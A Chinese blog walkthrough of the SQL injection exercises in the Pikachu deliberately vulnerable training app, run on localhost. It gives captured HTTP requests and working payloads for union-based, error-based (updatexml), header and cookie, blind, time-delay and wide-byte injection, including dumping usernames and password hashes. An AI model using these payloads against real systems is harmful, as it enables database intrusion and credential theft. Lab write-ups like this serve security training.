Pikachu漏洞练习平台之SQL注入

最新推荐文章于 2024-02-22 11:29:13 发布
最新推荐文章于 2024-02-22 11:29:13 发布
阅读量1.9k 收藏 21
点赞数 5
分类专栏: web安全知识
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43886632/article/details/104535914
版权

0x00 Pikachu
Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。
项目地址:https://github.com/zhuifengshaonianhanlu/pikachu

0x01 数字型注入(post)
界面如下
在这里插入图片描述

使用burpsuite抓包

POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pikachu/vul/sqli/sqli_id.php
Cookie: PHPSESSID=jcqksnto9ssab9bh3kokjrhmg6
Upgrade-Insecure-Requests: 1

id=1&submit=%E6%9F%A5%E8%AF%A2

id=1后面加单引号,报错,存在SQL注入
在这里插入图片描述
数字型的SQL语句为 select * from user where id =$id 因此不需要闭合。直接构造SQL语句

id=1 or 1=1#

在这里插入图片描述
查当前数据库

id=1 union select 1,database()#

在这里插入图片描述
查询当前数据库中的表

id=1 union select 1,table_name from information_schema.tables where table_schema="pikachu"#

在这里插入图片描述
查询users中的字段

id=1 union select 1,column_name from information_schema.columns where table_name="users"#

在这里插入图片描述
查询users中的数据

id=1 union select username,password from users#

在这里插入图片描述
密码是MD5加密的字符串,通过MD5在线解吗平台可以查看密码
在这里插入图片描述

0x02字符型注入
界面如下
在这里插入图片描述
在输入框中输入1加上单引号,数据库报错
在这里插入图片描述

猜测sql语句为select * from users where id = ‘$id’;需要闭合单引号

构造SQL语句 1’ or 1=1#
在这里插入图片描述
判断查询语句的列数

1'order by 1,2,3#

在这里插入图片描述
判断显示位

1' union select 1,2#

在这里插入图片描述
查询当前数据库

1' union select 1,database()#

在这里插入图片描述
其他同上,不在重复

0x03 搜索型SQL注入
界面如下
在这里插入图片描述

输入1加单引号,发现数据报错
在这里插入图片描述
猜测SQL查询语句为 select * from users where id like ‘%$id’;
需要闭合单引号

构造SQL语句 1’ or 1=1#
在这里插入图片描述
查看显示位

1' union select 1,2,3#

在这里插入图片描述
查询当前数据库

1' union select null,null,database()#

在这里插入图片描述

0x04 xx型注入
界面如下
在这里插入图片描述

输入1加单引号,数据库报错
在这里插入图片描述
猜测SQL查询语句为 select * from users where id = (’$id’)
需要闭合’)

构造SQL语句

1') union select 1,2#

显示位如下
在这里插入图片描述

查询当前数据库

1') union select null,database()#

在这里插入图片描述

0x05 insert/update注入
界面如下
在这里插入图片描述
点击注册,使用burpsuite抓包

POST /pikachu/vul/sqli/sqli_iu/sqli_reg.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pikachu/vul/sqli/sqli_iu/sqli_reg.php
Cookie: PHPSESSID=jcqksnto9ssab9bh3kokjrhmg6
Upgrade-Insecure-Requests: 1

username=1&password=123&sex=&phonenum=&email=&add=&submit=submit

在username=1后面加单引号,数据库报错
在这里插入图片描述
猜测SQL的语句为insert into user(Username,Password,Sex,PhoneNum,Address1,Address2) value(‘xxx’,xxx,‘男/女’,187xxxx,‘北京市xxx’,‘北京市xxx’)

在’xxx’处构造SQL语句闭合’or

查询前数据库

username=1' or updatexml(1,concat(0x7e,(select database())),0x7e) or '

在这里插入图片描述

查看pikachu的表

or (select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e)) or '

在这里插入图片描述
也可以一个表一个表的查看,使用limit
查第一个表

' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'pikachu' limit 0,1)),0) or'

在这里插入图片描述
0x06 delete注入
界面如下
在这里插入图片描述
先进行留言,然后通过burpsuite进行抓包

GET /pikachu/vul/sqli/sqli_del.php?id=65 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/pikachu/vul/sqli/sqli_del.php
Cookie: PHPSESSID=jcqksnto9ssab9bh3kokjrhmg6
Upgrade-Insecure-Requests: 1

在id=65后面加单引号,数据库报错
在这里插入图片描述
猜测此时的SQL查询语句为 delete ‘xx’ from message where id=$id
构造SQL语句

or updatexml(1, concat(0x7e,database()), 0)

在这里插入图片描述

0x07 http header注入
界面如下
在这里插入图片描述

输入admin,123456登录抓包

POST /pikachu/vul/sqli/sqli_header/sqli_header_login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pikachu/vul/sqli/sqli_header/sqli_header_login.php
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=dem47ia5mg3vmof5hg167n1s54
Upgrade-Insecure-Requests: 1

username=1&password=1&submit=Login

点击Forward
在这里插入图片描述
点击Forward后返回来的包

GET /pikachu/vul/sqli/sqli_header/sqli_header.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/pikachu/vul/sqli/sqli_header/sqli_header_login.php
Connection: close
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=dem47ia5mg3vmof5hg167n1s54
Upgrade-Insecure-Requests: 1

在UA后面加单引号,数据库报错
在这里插入图片描述
构造SQL语句

' or updatexml(1,concat(0x7e,(select database())),0x7e) or '

在这里插入图片描述

同样,在cookie处,admin后面加上单引号,数据库报错
在这里插入图片描述

构造SQL语句

ant[uname]=admin' or updatexml(1,concat(0x7e,(select database())),0x7e) or ';

在这里插入图片描述

0x08 布尔盲注
界面
在这里插入图片描述

输入Kobe,正确返回
在这里插入图片描述
构造语句

kobe' order by 1,2,3#

输入kobe’ order by 1,2#
则返回正确的信息,得一点一点的进行注入.直接用sqlmap就能一把跑出来.

0x09 延时注入
界面
在这里插入图片描述
构造语句

1' or sleep(5)#

明显出现延时
在这里插入图片描述

0x10 宽字节注入
界面
在这里插入图片描述
打开burpsuit抓包

POST /pikachu/vul/sqli/sqli_widebyte.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pikachu/vul/sqli/sqli_widebyte.php
Cookie: PHPSESSID=fifnqas6vcnrr74lqseeeei4e2
Upgrade-Insecure-Requests: 1

name=1&submit=%E6%9F%A5%E8%AF%A2

构造SQL语句

1%df' union select 1,database()#

在这里插入图片描述

php00py
关注
  • 5
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu漏洞练习环境
10-25
pikachu漏洞练习环境,直接放在apache中的www目录下即可,如遇到不会安装可留言或者私信我。
sql注入漏洞学习--pikachu 2023/03/24-25
m0_53689197的博客
03-25 189
sql注入漏洞学习--pikachu 2023/03/24-25
SQL注入——SQLi-Labs环境搭建
null1024的博客
08-16 577
前言 本篇文章主要简单介绍SQL注入漏洞以及练习平台SQLi-Labs环境搭建的步骤。 目录 一、关于SQL注入漏洞的介绍 二、关于SQLi-Labs的一些介绍 三、SQL-labs练习平台的环境搭建步骤 四、文章中提到的一些工具文件的分享 正文 一、关于SQL注入漏洞的介绍 SQL注入漏洞已经有十几年的历史,从最开始被发现到现在,它的危害与防范可以说是不断进行着。而SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL
Pikachu漏洞练习平台实验——SQL注入
最新发布
m0_73826804的博客
02-22 1644
SQL注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。比如我们期望用户输入整数的id,但是用户输入了上图中下面的语句,这是条能被正常执行的SQL语句,导致表中的数据都会输出。
Pikachu靶场—sql注入通关
oiadkt的博客
03-07 4071
pickchu—sql注入通关
pikachu SQL注入 (皮卡丘漏洞平台通关系列)
热门推荐
箭雨镜屋
05-01 1万+
一、官方的戏精引言 本节引用来自pikachu漏洞靶场 哦,SQL注入漏洞,可怕的漏洞。 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 ...
pikachu靶场通关之sql注入系列
qq_51902218的博客
09-16 6174
1.判断是否注入(是否严格校验)(1)可控参数(id)能否影响页面显示(2)输入的SQL语句是否能报错(能通过数据库报错,看到数据库一些语句痕迹)(selectusername,passwordfromuserwhereid=?’)后面单引号或者双引号通过在URL中修改对应的id值,值为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠\来探测URL中是否存在注入点(3)输入的SQL语句能否不报错(我们的语句能够成功闭合)(selectusername,passwordf。......
sql注入 pikachu post数字型注入
08-12
sql注入 pikachu post数字型注入
pikachu靶场SQL注入.docx
09-13
pikachu靶场SQL注入章节解题
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞
SQL注入漏洞攻击
10-01
SQL注入漏洞攻击 防范SQL注入漏洞攻击的方法,不使用SQL语句拼接,通过参数赋值
DVMA-渗透测试漏洞练习平台
12-02
DVMA-渗透测试漏洞练习平台, 其中内含XSS、SQL注入、文件上传、文件包含、CSRF和暴力破解等各个难度的测试环境
pikachu靶场-4 SQL注入漏洞
weixin_52180702的博客
12-12 2086
既然在页面上只能判断真假,那么这个时候我们就可以对数据库里面的结果去按照刚才的方法去截取一个字符,转换成ASCII码然后去进行比较,只不过这个方式会很麻烦,因为盲注这种情况你没法通过页面上的返回来直接拿数据,你只能通过这种猜测的方式(真或者假)去一步一步猜测后面的数据,所以盲注如果要手工利用的话会非常的麻烦,非常的耗时间,我们在搞懂盲注原理的情况下,可以使用工具去进行自动化的测试。那就需要结合我们的经验和我们的想象了,多去做一些payload的测试,根据返回结果来判断我们是否打中了。
pikachu-sql注入(皮卡丘)
twowords的博客
08-04 1980
数字型注入(post) post注入方式,可用BurpSuite进行抓包,发送到Repeater模块进行id值的修改 数字型注入 则不需要添加字符 payload: or 1=1 字符型注入(get) 字符型注入 当输入1'时 有报错信息''1'''可以看到源name值由单引号''包裹 可以用 '进行闭合 并用#注释掉后边内容 payload: 1' or 1=1 # 搜索型注入 根据提示 我们可以输入用户名一部分进行查询 并添加字符'如下图 并显示报错 由报错信息可以看到需要加%'进
pikachu+SQL注入+Burp Suit
qq_54537919的博客
03-11 2344
pikachu+SQL注入+Burp Suit 2.1数字型注入(post) 2.2 字符型注入(get) 2.3 搜索型注入 2.4 XX型注入
pikachu实验环境配置;初步掌握burpsuite;暴力破解实验演示;SQL注入浅析;
qq_44696653的博客
03-17 2827
一、Pikachu实验环境搭建 1)Burp suite运行环境搭建、下载 在Windous操作系统下运行Burpsuite需要配置Java环境,这里可以去官网进行下载安装,下载完成后注意改变环境变量。 在cmd运行输入java、javac数据都有相应反馈时,则证明Java环境配置成功。 Java环境配置完成即可进行Burpsuite的下载安装,并正常运行 (可使用注册机 注册机具体操作步骤较为...
pikachu靶场 暴力破解 sql注入详解
winofkill的博客
12-17 1975
pikachu靶场暴力破解,sql注入详解
pikachu SQL注入合集
小城的博客
12-20 2598
这里是目录sql注入数字型注入 n天更一次,但是是因为这几天太忙了啊,一直东跑西跑,暴风哭泣 大家好,我是小城,一个刚刚起步的学渣,笨鸟先飞,可惜我领悟得太晚。但从现在开始,我会努力加油进取变强! sql注入 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL
对SSRF的一次浅学习(CTF-hub)
quan9i的博客
05-04 1035
网刃杯时签到题都没做出来,太菜了,特此来学习一下SSRF
pikachu漏洞平台sql注入攻略
05-11
首先,要了解什么是SQL注入攻击,它是一种利用Web应用程序中存在的安全漏洞,通过将恶意的SQL语句插入到数据输入字段中,从而达到欺骗数据库执行恶意SQL语句的目的。 接下来,我们可以通过以下步骤进行Pikachu漏洞平台SQL注入攻击: 1. 确定目标 我们需要先确定攻击的目标,可以使用一些工具进行信息搜集和目标识别,例如:Nmap、Wappalyzer等。 2. 找到注入点 找到目标网站中存在注入漏洞的页面,可以通过一些工具进行扫描,例如:sqlmap、Burp Suite等。 3. 构造注入语句 在找到注入点后,我们需要构造SQL语句,例如:' or 1=1#、' or 1=1--、' or 1=1/*等,这些语句可以绕过网站的验证,让我们可以执行恶意的SQL语句。 4. 利用注入点获取数据 通过构造好的注入语句,我们可以获取到目标网站中的敏感数据,例如:用户名、密码等。 最后,我们需要注意的是,在进行SQL注入攻击时,一定要遵循法律规定,不要进行非法的攻击行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值